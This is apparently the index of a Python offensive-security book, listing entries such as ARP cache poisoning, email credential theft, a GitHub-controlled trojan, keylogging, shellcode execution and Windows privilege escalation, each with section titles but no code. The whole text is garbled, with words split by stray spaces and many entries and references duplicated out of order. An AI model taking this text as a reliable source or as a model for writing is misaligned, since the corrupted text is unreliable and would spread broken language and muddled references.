,
SSH w ith P ara m ik o
,
SSH w ith
Para m ik o
,
SSH w ith P ara m ik o
,
SSH w ith P ara m ik o
cre ati n g S SH s e rv er,
SSH w ith P ara m ik o
in sta llin g P ara m ik o ,
SSH w ith P ara m ik o
key a uth enti c ati o n,
SSH w ith P ara m ik o
ru nnin g c o m mand s o n W in d ow s c lie nt o ver S SH ,
SSH w ith P ara m ik o
te sti n g,
SSH w ith P ara m ik o
netw ork s n iffe rs ,
The N etw ork : R aw S ockets a nd S niffin g
,
The N etw ork : R aw S ockets a nd S niffin g
,
The N etw ork : R aw S ockets a nd S niffin g
,
Packet S niffin g o n W in d ow s a nd L in ux
,
Packet S niffin g o n
Win d ow s a nd L in ux
,
Packet S niffin g o n W in d ow s a nd L in ux
,
Deco din g th e I P L ayer
,
Deco din g th e I P
Layer
,
Deco din g th e I P L ayer
,
Deco din g th e I P L ayer
,
Kic kin g th e T ir e s
,
Kic kin g th e T ir e s
,
Kic kin g
th e T ir e s
,
Deco din g I C M P
,
Deco din g I C M P
,
Deco din g I C M P
,
Deco din g I C M P

dis c o verin g a cti v e h o sts o n n etw ork s e gm ents ,
The N etw ork : R aw S ockets a nd S niffin g
IC M P m essa ge d eco din g r o uti n e,
Kic kin g th e T ir e s
,
Kic kin g th e T ir e s
,
Kic kin g th e T ir e s
,
Deco din g
IC M P
,
Deco din g I C M P
,
Deco din g I C M P
,
Deco din g I C M P
Desti n ati o n U nre achab le m essa ge,
Kic kin g th e T ir e s
,
Deco din g I C M P
le ngth c alc ula ti o n,
Deco din g I C M P
messa ge e le m ents ,
Kic kin g th e T ir e s
se nd in g U D P d ata gra m s a nd i n te rp re ti n g r e su lts ,
Deco din g I C M P
te sti n g,
Deco din g I C M P
IP h ead er d eco din g r o uti n e,
Packet S niffin g o n W in d ow s a nd L in ux
,
Deco din g th e I P L ayer
,
Deco din g th e I P L ayer
,
Deco din g th e I P L ayer
,
Deco din g th e I P L ayer
av oid in g b it m anip ula ti o n,
Deco din g th e I P L ayer
hum an-re ad ab le p ro to co l,
Deco din g th e I P L ayer
te sti n g,
Deco din g th e I P L ayer
ty p ic al I P v4 h ead er s tr u ctu re ,
Deco din g th e I P L ayer
pro m is c uo us m ode,
Packet S niffin g o n W in d ow s a nd L in ux
se tti n g u p r a w s o cket s n iffe r,
Packet S niffin g o n W in d ow s a nd L in ux
Win d ow s v ers u s L in ux,
The N etw ork : R aw S ockets a nd S niffin g
__new __ m eth o d,
Deco din g th e I P L ayer
O
offe nsiv e f o re nsic s a uto m ati o n,
Auto m ati n g O ffe nsiv e F ore nsic s
,
Auto m ati n g O ffe nsiv e F ore nsic s
,
Auto m ati n g O ffe nsiv e F ore nsic s
,
Gra b bin g P assw ord H ash es
,
Dir e ct C ode I n je cti o n
dir e ct c o de i n je cti o n,
Dir e ct C ode I n je cti o n
in sta llin g V ola ti lity ,
Auto m ati n g O ffe nsiv e F ore nsic s
pro file s,
Auto m ati n g O ffe nsiv e F ore nsic s
re co verin g p assw ord h ash es,
Gra b bin g P assw ord H ash es
onlin e r e so urc es,
Setti n g U p Y our P yth o n E nv ir o nm ent
,
In sta llin g K ali L in ux
,
Win gID E
,
The N etw ork :
Basic s
,
SSH w ith P ara m ik o
,
SSH w ith P ara m ik o
,
The N etw ork : R aw S ockets a nd S niffin g
,
Packet
Sniffin g o n W in d ow s a nd L in ux
,
Kic kin g th e T ir e s
,
Ow nin g th e N etw ork w ith S cap y
,
Ow nin g th e
Netw ork w ith S cap y
,
PC A P P ro cessin g
,
PC A P P ro cessin g
,
Kic kin g th e T ir e s
,
Kic kin g th e T ir e s
,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
,
Kic kin g th e T ir e s
,
Exte nd in g B urp P ro xy
,
Exte nd in g B urp
Pro xy
,
Exte nd in g B urp P ro xy
,
Bin g f o r B urp
,
Gith ub C om mand a nd C ontr o l
,
Gith ub C om mand a nd
Contr o l
,
Build in g a G ith ub -A w are T ro ja n
,
Hackin g P yth o n’s i m port F uncti o nality
,
Keylo ggin g f o r F un
and K eystr o kes
,
Takin g S cre ensh o ts
,
Pyth o nic S hellc o de E xecuti o n
,
Cre ati n g th e S erv er
,
Win d ow s
Priv ile ge E sc ala ti o n
,
Win d ow s P riv ile ge E sc ala ti o n
,
Cre ati n g a P ro cess M onito r
,
Cre ati n g a P ro cess

Monito r
,
Pro cess M onito rin g w ith W MI
,
Kic kin g th e T ir e s
,
Auto m ati n g O ffe nsiv e F ore nsic s
,
Dir e ct
Code I n je cti o n
,
Dir e ct C ode I n je cti o n
Bin g A PI k eys,
Bin g f o r B urp
Burp ,
Exte nd in g B urp P ro xy
Cain a nd A bel,
Kic kin g th e T ir e s
Carlo s P ere z,
Kic kin g th e T ir e s
cre ati n g b asic s tr u ctu re f o r r e p o,
Gith ub C om mand a nd C ontr o l
Dir B uste r p ro je ct,
Kic kin g th e T ir e s
El J e fe p ro je ct,
Cre ati n g a P ro cess M onito r
fa cia l d ete cti o n c o de,
PC A P P ro cessin g
genera ti n g M eta sp lo it p aylo ad s,
Pyth o nic S hellc o de E xecuti o n
hackin g P yth o n i m port f u ncti o nality ,
Hackin g P yth o n’s i m port F uncti o nality
Hussa m K hra is ,
SSH w ith P ara m ik o
Im munity D eb ugger,
Dir e ct C ode I n je cti o n
in p ut/ o utp ut c o ntr o l ( IO CTL),
Packet S niffin g o n W in d ow s a nd L in ux
Jo om la a d m in is tr a to r l o gin f o rm ,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
Jy th o n,
Exte nd in g B urp P ro xy
Kali L in ux,
In sta llin g K ali L in ux
Messa geB ox s h ellc o de,
Dir e ct C ode I n je cti o n
neta d dr m odule ,
Kic kin g th e T ir e s
OpenC V,
PC A P P ro cessin g
Para m ik o ,
SSH w ith P ara m ik o
PortS w ig ger W eb S ecurity ,
Exte nd in g B urp P ro xy
priv ile ge e sc ala ti o n e xam ple s e rv ic e,
Win d ow s P riv ile ge E sc ala ti o n
py2 exe,
Build in g a G ith ub -A w are T ro ja n
PyC ry p to p ackage,
Cre ati n g th e S erv er
PyH ook l ib ra ry ,
Keylo ggin g f o r F un a nd K eystr o kes
Pyth o n G itH ub A PI l ib ra ry ,
Gith ub C om mand a nd C ontr o l
Pyth o n W MI p age,
Cre ati n g a P ro cess M onito r
PyW in 3 2 i n sta lle r,
Win d ow s P riv ile ge E sc ala ti o n
Scap y,
Ow nin g th e N etw ork w ith S cap y
,
Ow nin g th e N etw ork w ith S cap y
so cket m odule ,
The N etw ork : B asic s

SV N Dig ger,
Kic kin g th e T ir e s
VM Ware P la yer,
Setti n g U p Y our P yth o n E nv ir o nm ent
Vola ti lity f r a m ew ork ,
Auto m ati n g O ffe nsiv e F ore nsic s
Win 3 2_P ro cess c la ss d ocum enta ti o n,
Pro cess M onito rin g w ith W MI
Win d ow s G DI,
Takin g S cre ensh o ts
Win gID E,
Win gID E
Wir e sh ark ,
The N etw ork : R aw S ockets a nd S niffin g
OpenC V,
PC A P P ro cessin g
,
PC A P P ro cessin g
os.w alk f u ncti o n,
Map pin g O pen S ourc e W eb A pp I n sta lla ti o ns
ow ned f la g,
Man-in -th e-B ro w se r ( K in d O f)
P
packet c ap tu re f ile p ro cessin g,
Kic kin g th e T ir e s
( s e e P C A P p ro cessin g)
packet.s h o w () f u ncti o n,
Ste alin g E m ail C re d enti a ls
Para m ik o ,
SSH w ith P ara m ik o
,
SSH w ith P ara m ik o
,
SSH w ith P ara m ik o
,
SSH w ith P ara m ik o
,
SSH
with P ara m ik o
,
SSH w ith P ara m ik o
cre ati n g S SH s e rv er,
SSH w ith P ara m ik o
in sta llin g,
SSH w ith P ara m ik o
ru nnin g c o m mand s o n W in d ow s c lie nt o ver S SH ,
SSH w ith P ara m ik o
SSH k ey a uth enti c ati o n,
SSH w ith P ara m ik o
te sti n g,
SSH w ith P ara m ik o
passw ord -g uessin g w ord lis t,
Turn in g W eb site C onte nt i n to P assw ord G old
,
Turn in g W eb site C onte nt
in to P assw ord G old
,
Turn in g W eb site C onte nt i n to P assw ord G old
,
Turn in g W eb site C onte nt i n to
Passw ord G old
,
Turn in g W eb site C onte nt i n to P assw ord G old
co nv erti n g s e le cte d H TTP tr a ffic i n to w ord lis t,
Turn in g W eb site C onte nt i n to P assw ord G old
fu ncti o nality to d is p la y w ord lis t,
Turn in g W eb site C onte nt i n to P assw ord G old
te sti n g,
Turn in g W eb site C onte nt i n to P assw ord G old
,
Turn in g W eb site C onte nt i n to P assw ord G old
Paylo ad s ta b , B urp ,
Kic kin g th e T ir e s
,
Kic kin g th e T ir e s
PC A P ( p acket c ap tu re f ile ) p ro cessin g,
ARP C ache P ois o nin g w ith S cap y
,
Kic kin g th e T ir e s
,
Kic kin g
th e T ir e s
,
PC A P P ro cessin g
,
PC A P P ro cessin g
,
PC A P P ro cessin g
,
PC A P P ro cessin g

ad din g f a cia l d ete cti o n c o de,
PC A P P ro cessin g
ad din g s u p porti n g f u ncti o ns,
PC A P P ro cessin g
ARP c ache p ois o nin g r e su lts ,
ARP C ache P ois o nin g w ith S cap y
co din g p ro cessin g s c rip t,
PC A P P ro cessin g
im age c arv in g s c rip t,
Kic kin g th e T ir e s
te sti n g,
PC A P P ro cessin g
Pere z, C arlo s,
Kic kin g th e T ir e s
pip p ackage m anager,
In sta llin g K ali L in ux
PO P3 c re d enti a ls , s te alin g,
Ow nin g th e N etw ork w ith S cap y
,
Ste alin g E m ail C re d enti a ls
popula te _ offs e ts f u ncti o n,
Gra b bin g P assw ord H ash es
Port U nre achab le e rro r,
Kic kin g th e T ir e s
PortS w ig ger W eb S ecurity ,
Exte nd in g B urp P ro xy
Positi o ns ta b , B urp ,
Kic kin g th e T ir e s
,
Kic kin g th e T ir e s
post_ to _tu m blr f u ncti o n,
IE C O M A uto m ati o n f o r E xfiltr a ti o n
priv ile ge e sc ala ti o n,
Win d ow s P riv ile ge E sc ala ti o n
,
Win d ow s P riv ile ge E sc ala ti o n
,
Win d ow s
Priv ile ge E sc ala ti o n
,
Cre ati n g a P ro cess M onito r
,
Cre ati n g a P ro cess M onito r
,
Pro cess M onito rin g
with W MI
,
Pro cess M onito rin g w ith W MI
,
Win d ow s T oken P riv ile ges
,
Win d ow s T oken P riv ile ges
,
Win nin g th e R ace
,
Win nin g th e R ace
,
Win nin g th e R ace
,
Kic kin g th e T ir e s
co de i n je cti o n,
Kic kin g th e T ir e s
in sta llin g e xam ple s e rv ic e,
Win d ow s P riv ile ge E sc ala ti o n
in sta llin g l ib ra rie s,
Win d ow s P riv ile ge E sc ala ti o n
pro cess m onito rin g,
Cre ati n g a P ro cess M onito r
,
Cre ati n g a P ro cess M onito r
,
Pro cess M onito rin g
with W MI
te sti n g,
Pro cess M onito rin g w ith W MI
with W MI,
Cre ati n g a P ro cess M onito r
to ken p riv ile ges,
Pro cess M onito rin g w ith W MI
,
Win d ow s T oken P riv ile ges
,
Win d ow s T oken
Priv ile ges
auto m ati c ally r e tr ie v in g e nab le d p riv ile ges,
Win d ow s T oken P riv ile ges
outp utti n g a nd l o ggin g,
Win d ow s T oken P riv ile ges
win nin g r a ce a gain st c o de e xecuti o n,
Win nin g th e R ace
,
Win nin g th e R ace
,
Win nin g th e R ace
cre ati n g f ile m onito r,
Win nin g th e R ace
te sti n g,
Win nin g th e R ace

prn p ara m ete r,
Ow nin g th e N etw ork w ith S cap y
pro cess m onito rin g,
Cre ati n g a P ro cess M onito r
,
Cre ati n g a P ro cess M onito r
,
Pro cess M onito rin g
with W MI
win nin g r a ce a gain st c o de e xecuti o n,
Cre ati n g a P ro cess M onito r
,
Pro cess M onito rin g w ith W MI
te sti n g,
Pro cess M onito rin g w ith W MI
with W MI,
Cre ati n g a P ro cess M onito r
pro cess_ w atc her f u ncti o n,
Pro cess M onito rin g w ith W MI
--p ro file f la g,
Auto m ati n g O ffe nsiv e F ore nsic s
Pro xy ta b , B urp ,
Kic kin g th e T ir e s
,
Kic kin g th e T ir e s
pro xy_ hand le r f u ncti o n,
Build in g a T C P P ro xy
PSLis t c la ss,
Dir e ct C ode I n je cti o n
py2 exe,
Build in g a G ith ub -A w are T ro ja n
PyC ry p to p ackage,
Cre ati n g th e S erv er
,
IE C O M A uto m ati o n f o r E xfiltr a ti o n
PyH ook l ib ra ry ,
Keylo ggin g f o r F un a nd K eystr o kes
,
Sand box D ete cti o n
Pyth o n G itH ub A PI l ib ra ry ,
Gith ub C om mand a nd C ontr o l
PyW in 3 2 i n sta lle r,
Win d ow s P riv ile ge E sc ala ti o n
Q
Queue o bje cts ,
Map pin g O pen S ourc e W eb A pp I n sta lla ti o ns
,
Bru te -F orc in g D ir e cto rie s a nd F ile
Locati o ns
R
ra nd om _sle ep f u ncti o n,
IE C O M A uto m ati o n f o r E xfiltr a ti o n
Read D ir e cto ry C hangesW f u ncti o n,
Win nin g th e R ace
re ceiv e_ fr o m f u ncti o n,
Build in g a T C P P ro xy
re cv fr o m () f u ncti o n,
TC P C lie nt
re gis te rIn tr u d erP aylo ad G enera to rF acto ry f u ncti o n,
Burp F uzzin g
Regis tr y A pi c la ss,
Gra b bin g P assw ord H ash es
Rep eate r to ol, B urp ,
Burp F uzzin g
Req uest c la ss,
The S ocket L ib ra ry o f th e W eb : u rllib 2
re q uest_ hand le r f u ncti o n,
Build in g a T C P P ro xy
re q uest_ port_ fo rw ard f u ncti o n,
SSH T unnelin g
re se t f u ncti o n,
Burp F uzzin g

re sp onse _ hand le r f u ncti o n,
Build in g a T C P P ro xy
re sto re _ ta rg et f u ncti o n,
ARP C ache P ois o nin g w ith S cap y
re v ers e S SH tu nnelin g,
Kic kin g th e T ir e s
,
SSH T unnelin g
,
SSH T unnelin g
re v ers e _ fo rw ard _tu nnel f u ncti o n,
SSH T unnelin g
ru n f u ncti o n,
Cre ati n g M odule s
S
sa nd box d ete cti o n,
Kic kin g th e T ir e s
Scap y l ib ra ry ,
Ow nin g th e N etw ork w ith S cap y
,
Ow nin g th e N etw ork w ith S cap y
,
Ow nin g th e
Netw ork w ith S cap y
,
Ow nin g th e N etw ork w ith S cap y
,
Ste alin g E m ail C re d enti a ls
,
Ste alin g E m ail
Cre d enti a ls
,
ARP C ache P ois o nin g w ith S cap y
,
ARP C ache P ois o nin g w ith S cap y
,
ARP C ache
Pois o nin g w ith S cap y
,
ARP C ache P ois o nin g w ith S cap y
,
ARP C ache P ois o nin g w ith S cap y
,
ARP
Cache P ois o nin g w ith S cap y
,
Kic kin g th e T ir e s
,
PC A P P ro cessin g
,
PC A P P ro cessin g
,
PC A P
Pro cessin g
,
PC A P P ro cessin g
ARP c ache p ois o nin g,
ARP C ache P ois o nin g w ith S cap y
,
ARP C ache P ois o nin g w ith S cap y
,
ARP
Cache P ois o nin g w ith S cap y
,
ARP C ache P ois o nin g w ith S cap y
,
ARP C ache P ois o nin g w ith S cap y
ad din g s u p porti n g f u ncti o ns,
ARP C ache P ois o nin g w ith S cap y
co din g p ois o nin g s c rip t,
ARP C ache P ois o nin g w ith S cap y
in sp ecti n g c ache,
ARP C ache P ois o nin g w ith S cap y
te sti n g,
ARP C ache P ois o nin g w ith S cap y
in sta llin g,
Ow nin g th e N etw ork w ith S cap y
PC A P p ro cessin g,
ARP C ache P ois o nin g w ith S cap y
,
Kic kin g th e T ir e s
,
PC A P P ro cessin g
,
PC A P
Pro cessin g
,
PC A P P ro cessin g
,
PC A P P ro cessin g
ad din g f a cia l d ete cti o n c o de,
PC A P P ro cessin g
ad din g s u p porti n g f u ncti o ns,
PC A P P ro cessin g
ARP c ache p ois o nin g r e su lts ,
ARP C ache P ois o nin g w ith S cap y
co din g p ro cessin g s c rip t,
PC A P P ro cessin g
im age c arv in g s c rip t,
Kic kin g th e T ir e s
te sti n g,
PC A P P ro cessin g
ste alin g e m ail c re d enti a ls ,
Ow nin g th e N etw ork w ith S cap y
,
Ow nin g th e N etw ork w ith S cap y
,
Ste alin g E m ail C re d enti a ls
,
Ste alin g E m ail C re d enti a ls
ap ply in g f ilte r f o r c o m mon m ail p orts ,
Ste alin g E m ail C re d enti a ls
cre ati n g s im ple s n iffe r,
Ow nin g th e N etw ork w ith S cap y
te sti n g,
Ste alin g E m ail C re d enti a ls

Sco pe ta b , B urp ,
Kic kin g th e T ir e s
,
Turn in g W eb site C onte nt i n to P assw ord G old
sc re ensh o ts ,
Kic kin g th e T ir e s
SeB ackup P riv ile ge p riv ile ge,
Win d ow s T oken P riv ile ges
Secure S hell,
SSH w ith P ara m ik o
( s e e S SH )
SeD eb ugP riv ile ge p riv ile ge,
Win d ow s T oken P riv ile ges
Sele ctO bje ct f u ncti o n,
Takin g S cre ensh o ts
SeL oad D riv er p riv ile ge,
Win d ow s T oken P riv ile ges
,
Win d ow s T oken P riv ile ges
se nd to () f u ncti o n,
TC P C lie nt
se rv er_ lo op f u ncti o n,
Rep la cin g N etc at
SetW in d ow sH ookE x f u ncti o n,
Keylo ggin g f o r F un a nd K eystr o kes
sh ellc o de e xecuti o n,
Takin g S cre ensh o ts
Sim ple H TTPServ er m odule ,
Pyth o nic S hellc o de E xecuti o n
Site m ap ta b , B urp ,
Turn in g W eb site C onte nt i n to P assw ord G old
,
Kic kin g th e T ir e s
SM TP c re d enti a ls , s te alin g,
Ow nin g th e N etw ork w ith S cap y
,
Ste alin g E m ail C re d enti a ls
sn iff f u ncti o n,
Ow nin g th e N etw ork w ith S cap y
so cket m odule ,
The N etw ork : B asic s
,
The N etw ork : B asic s
,
TC P C lie nt
,
TC P S erv er
,
TC P S erv er
,
Kic kin g th e T ir e s
build in g T C P p ro xie s,
Kic kin g th e T ir e s
cre ati n g T C P c lie nts ,
The N etw ork : B asic s
cre ati n g T C P s e rv ers ,
TC P S erv er
cre ati n g U D P c lie nts ,
TC P C lie nt
netc at- lik e f u ncti o nality ,
TC P S erv er
SO CK _D GRA M p ara m ete r,
TC P C lie nt
SO CK _S T R EA M p ara m ete r,
The N etw ork : B asic s
SSH ( S ecure S hell) ,
SSH w ith P ara m ik o
,
SSH w ith P ara m ik o
,
SSH w ith P ara m ik o
,
SSH w ith
Para m ik o
,
SSH w ith P ara m ik o
,
SSH w ith P ara m ik o
,
Kic kin g th e T ir e s
,
Kic kin g th e T ir e s
,
Kic kin g th e
Tir e s
,
Kic kin g th e T ir e s
,
SSH T unnelin g
,
SSH T unnelin g
,
SSH T unnelin g

tu nnelin g,
Kic kin g th e T ir e s
,
Kic kin g th e T ir e s
,
Kic kin g th e T ir e s
,
Kic kin g th e T ir e s
,
SSH
Tunnelin g
,
SSH T unnelin g
,
SSH T unnelin g
fo rw ard ,
Kic kin g th e T ir e s
,
Kic kin g th e T ir e s
re v ers e ,
Kic kin g th e T ir e s
,
SSH T unnelin g
,
SSH T unnelin g
te sti n g,
SSH T unnelin g
with P ara m ik o ,
SSH w ith P ara m ik o
,
SSH w ith P ara m ik o
,
SSH w ith P ara m ik o
,
SSH w ith
Para m ik o
,
SSH w ith P ara m ik o
,
SSH w ith P ara m ik o
cre ati n g S SH s e rv er,
SSH w ith P ara m ik o
in sta llin g P ara m ik o ,
SSH w ith P ara m ik o
key a uth enti c ati o n,
SSH w ith P ara m ik o
ru nnin g c o m mand s o n W in d ow s c lie nt o ver S SH ,
SSH w ith P ara m ik o
te sti n g,
SSH w ith P ara m ik o
ssh _ co m mand f u ncti o n,
SSH w ith P ara m ik o
Sta ck D ata ta b , W in gID E,
Win gID E
sta rt_ m onito r f u ncti o n,
Win nin g th e R ace
sto re p ara m ete r,
Ste alin g E m ail C re d enti a ls
sto re _ m odule _ re su lt f u ncti o n,
Build in g a G ith ub -A w are T ro ja n
str ip f u ncti o n,
Turn in g W eb site C onte nt i n to P assw ord G old
su b pro cess l ib ra ry ,
Rep la cin g N etc at
SV N Dig ger,
Kic kin g th e T ir e s
T
TagS tr ip per c la ss,
Turn in g W eb site C onte nt i n to P assw ord G old
ta g_ re su lts d ic ti o nary ,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
Targ et ta b , B urp ,
Kic kin g th e T ir e s
,
Turn in g W eb site C onte nt i n to P assw ord G old
,
Turn in g W eb site
Conte nt i n to P assw ord G old
TC P c lie nts , c re ati n g,
The N etw ork : B asic s
TC P p ro xie s,
Kic kin g th e T ir e s
,
Kic kin g th e T ir e s
,
Build in g a T C P P ro xy
,
Build in g a T C P P ro xy
,
Build in g a T C P P ro xy

cre ati n g,
Kic kin g th e T ir e s
hex d um pin g f u ncti o n,
Build in g a T C P P ro xy
pro xy_ hand le r f u ncti o n,
Build in g a T C P P ro xy
re aso ns f o r b uild in g,
Kic kin g th e T ir e s
te sti n g,
Build in g a T C P P ro xy
TC P s e rv ers , c re ati n g,
TC P S erv er
TC PServ er c la ss,
Man-in -th e-B ro w se r ( K in d O f)
te st_ re m ote f u ncti o n,
Map pin g O pen S ourc e W eb A pp I n sta lla ti o ns
to ken p riv ile ges,
Pro cess M onito rin g w ith W MI
,
Win d ow s T oken P riv ile ges
,
Win d ow s T oken
Priv ile ges
auto m ati c ally r e tr ie v in g e nab le d p riv ile ges,
Win d ow s T oken P riv ile ges
outp utti n g a nd l o ggin g,
Win d ow s T oken P riv ile ges
tr a nsp ort m eth o d,
SSH T unnelin g
tr o ja ns,
Gith ub C om mand a nd C ontr o l
,
Gith ub C om mand a nd C ontr o l
,
Cre ati n g M odule s
,
Tro ja n
Config ura ti o n
,
Build in g a G ith ub -A w are T ro ja n
,
Hackin g P yth o n’s i m port F uncti o nality
,
Hackin g
Pyth o n’s i m port F uncti o nality
,
Kic kin g th e T ir e s
,
Com mon T ro ja nin g T ask s o n W in d ow s
,
Keylo ggin g
fo r F un a nd K eystr o kes
,
Kic kin g th e T ir e s
,
Takin g S cre ensh o ts
,
Kic kin g th e T ir e s
GitH ub -a w are ,
Gith ub C om mand a nd C ontr o l
,
Gith ub C om mand a nd C ontr o l
,
Cre ati n g M odule s
,
Tro ja n C onfig ura ti o n
,
Build in g a G ith ub -A w are T ro ja n
,
Hackin g P yth o n’s i m port F uncti o nality
,
Hackin g P yth o n’s i m port F uncti o nality
,
Kic kin g th e T ir e s
acco unt s e tu p ,
Gith ub C om mand a nd C ontr o l
build in g,
Build in g a G ith ub -A w are T ro ja n
co nfig urin g,
Tro ja n C onfig ura ti o n
cre ati n g m odule s,
Cre ati n g M odule s
hackin g i m port f u ncti o nality ,
Hackin g P yth o n’s i m port F uncti o nality
im pro vem ents a nd e nhancem ents to ,
Kic kin g th e T ir e s
te sti n g,
Hackin g P yth o n’s i m port F uncti o nality
Win d ow s ta sk s,
Com mon T ro ja nin g T ask s o n W in d ow s
,
Keylo ggin g f o r F un a nd K eystr o kes
,
Kic kin g th e T ir e s
,
Takin g S cre ensh o ts
,
Kic kin g th e T ir e s
keylo ggin g,
Keylo ggin g f o r F un a nd K eystr o kes
sa nd box d ete cti o n,
Kic kin g th e T ir e s
sc re ensh o ts ,
Kic kin g th e T ir e s
sh ellc o de e xecuti o n,
Takin g S cre ensh o ts

Tum blr,
Cre ati n g th e S erv er
U
UD P c lie nts , c re ati n g,
TC P C lie nt
ud p_se nd er f u ncti o n,
Deco din g I C M P
urllib 2 l ib ra ry ,
The S ocket L ib ra ry o f th e W eb : u rllib 2
,
Takin g S cre ensh o ts
urlo pen f u ncti o n,
The S ocket L ib ra ry o f th e W eb : u rllib 2
V
VM Ware P la yer,
Setti n g U p Y our P yth o n E nv ir o nm ent
Vola ti lity f r a m ew ork ,
Auto m ati n g O ffe nsiv e F ore nsic s
,
Auto m ati n g O ffe nsiv e F ore nsic s
,
Auto m ati n g
Offe nsiv e F ore nsic s
,
Gra b bin g P assw ord H ash es
,
Dir e ct C ode I n je cti o n
dir e ct c o de i n je cti o n,
Dir e ct C ode I n je cti o n
in sta llin g,
Auto m ati n g O ffe nsiv e F ore nsic s
pro file s,
Auto m ati n g O ffe nsiv e F ore nsic s
re co verin g p assw ord h ash es,
Gra b bin g P assw ord H ash es
W
wait_ fo r_ bro w se r f u ncti o n,
Man-in -th e-B ro w se r ( K in d O f)
wb f la g,
Rep la cin g N etc at
web a p plic ati o n a tta cks,
Web H ackery
,
The S ocket L ib ra ry o f th e W eb : u rllib 2
,
The S ocket L ib ra ry o f
th e W eb : u rllib 2
,
The S ocket L ib ra ry o f th e W eb : u rllib 2
,
Map pin g O pen S ourc e W eb A pp
In sta lla ti o ns
,
Kic kin g th e T ir e s
,
Bru te -F orc in g D ir e cto rie s a nd F ile L ocati o ns
,
Bru te -F orc in g
Dir e cto rie s a nd F ile L ocati o ns
,
Bru te -F orc in g D ir e cto rie s a nd F ile L ocati o ns
,
Bru te -F orc in g
Dir e cto rie s a nd F ile L ocati o ns
,
Bru te -F orc in g D ir e cto rie s a nd F ile L ocati o ns
,
Bru te -F orc in g H TM L
Form A uth enti c ati o n
,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
,
Bru te -F orc in g H TM L F orm
Auth enti c ati o n
,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
,
Bru te -F orc in g H TM L F orm
Auth enti c ati o n
,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
,
Bru te -F orc in g H TM L F orm
Auth enti c ati o n
,
Kic kin g th e T ir e s
,
Burp F uzzin g
,
Burp F uzzin g
,
Burp F uzzin g
,
Burp F uzzin g
,
Burp
Fuzzin g
,
Burp F uzzin g
,
Kic kin g th e T ir e s
,
Kic kin g th e T ir e s
,
Kic kin g th e T ir e s
,
Kic kin g th e T ir e s

bru te -fo rc in g d ir e cto rie s a nd f ile l o cati o ns,
Kic kin g th e T ir e s
,
Bru te -F orc in g D ir e cto rie s a nd F ile
Locati o ns
,
Bru te -F orc in g D ir e cto rie s a nd F ile L ocati o ns
,
Bru te -F orc in g D ir e cto rie s a nd F ile
Locati o ns
,
Bru te -F orc in g D ir e cto rie s a nd F ile L ocati o ns
,
Bru te -F orc in g D ir e cto rie s a nd F ile
Locati o ns
ap ply in g l is t o f e xte nsio ns to te st f o r,
Bru te -F orc in g D ir e cto rie s a nd F ile L ocati o ns
cre ati n g l is t o f e xte nsio ns,
Bru te -F orc in g D ir e cto rie s a nd F ile L ocati o ns
cre ati n g Q ueue o bje cts o ut o f w ord lis t f ile s,
Bru te -F orc in g D ir e cto rie s a nd F ile L ocati o ns
se tti n g u p w ord lis t,
Bru te -F orc in g D ir e cto rie s a nd F ile L ocati o ns
te sti n g,
Bru te -F orc in g D ir e cto rie s a nd F ile L ocati o ns
bru te -fo rc in g H TM L f o rm a uth enti c ati o n,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
,
Bru te -F orc in g
HTM L F orm A uth enti c ati o n
,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
,
Bru te -F orc in g H TM L
Form A uth enti c ati o n
,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
,
Bru te -F orc in g H TM L F orm
Auth enti c ati o n
,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
,
Kic kin g th e T ir e s
ad m in is tr a to r l o gin f o rm ,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
genera l s e tti n gs,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
HTM L p ars in g c la ss,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
pasti n g i n w ord lis t,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
prim ary b ru te -fo rc in g c la ss,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
re q uest f lo w ,
Bru te -F orc in g H TM L F orm A uth enti c ati o n
te sti n g,
Kic kin g th e T ir e s
GET r e q uests ,
The S ocket L ib ra ry o f th e W eb : u rllib 2
,
The S ocket L ib ra ry o f th e W eb : u rllib 2
,
The
Socket L ib ra ry o f th e W eb : u rllib 2
,
Map pin g O pen S ourc e W eb A pp I n sta lla ti o ns
map pin g o pen s o urc e w eb a p p i n sta lla ti o ns,
Map pin g O pen S ourc e W eb A pp I n sta lla ti o ns
sim ple ,
The S ocket L ib ra ry o f th e W eb : u rllib 2
so cket l ib ra ry ,
The S ocket L ib ra ry o f th e W eb : u rllib 2
usin g R eq uest c la ss,
The S ocket L ib ra ry o f th e W eb : u rllib 2
web a p plic ati o n f u zze rs ,
Burp F uzzin g
,
Burp F uzzin g
,
Burp F uzzin g
,
Burp F uzzin g
,
Burp F uzzin g
,
Burp F uzzin g
,
Kic kin g th e T ir e s
,
Kic kin g th e T ir e s
,
Kic kin g th e T ir e s
,
Kic kin g th e T ir e s
accessin g B urp d ocum enta ti o n,
Burp F uzzin g
im ple m enti n g c o de to m eet r e q uir e m ents ,
Burp F uzzin g
lo ad in g e xte nsio n,
Burp F uzzin g
,
Burp F uzzin g
,
Kic kin g th e T ir e s
sim ple f u zze r,
Burp F uzzin g
usin g e xte nsio n i n a tta cks,
Kic kin g th e T ir e s
,
Kic kin g th e T ir e s
,
Kic kin g th e T ir e s

win 3 2se curity m odule ,
Win d ow s T oken P riv ile ges
Win 3 2_P ro cess c la ss,
Pro cess M onito rin g w ith W MI
,
Pro cess M onito rin g w ith W MI
Win d ow s G ra p hic s D ev ic e I n te rfa ce ( G DI) ,
Kic kin g th e T ir e s
Win d ow s p riv ile ge e sc ala ti o n,
Win d ow s P riv ile ge E sc ala ti o n
,
Win d ow s P riv ile ge E sc ala ti o n
,
Win d ow s P riv ile ge E sc ala ti o n
,
Cre ati n g a P ro cess M onito r
,
Cre ati n g a P ro cess M onito r
,
Pro cess
Monito rin g w ith W MI
,
Pro cess M onito rin g w ith W MI
,
Win d ow s T oken P riv ile ges
,
Win d ow s T oken
Priv ile ges
,
Win nin g th e R ace
,
Win nin g th e R ace
,
Win nin g th e R ace
,
Kic kin g th e T ir e s
co de i n je cti o n,
Kic kin g th e T ir e s
in sta llin g e xam ple s e rv ic e,
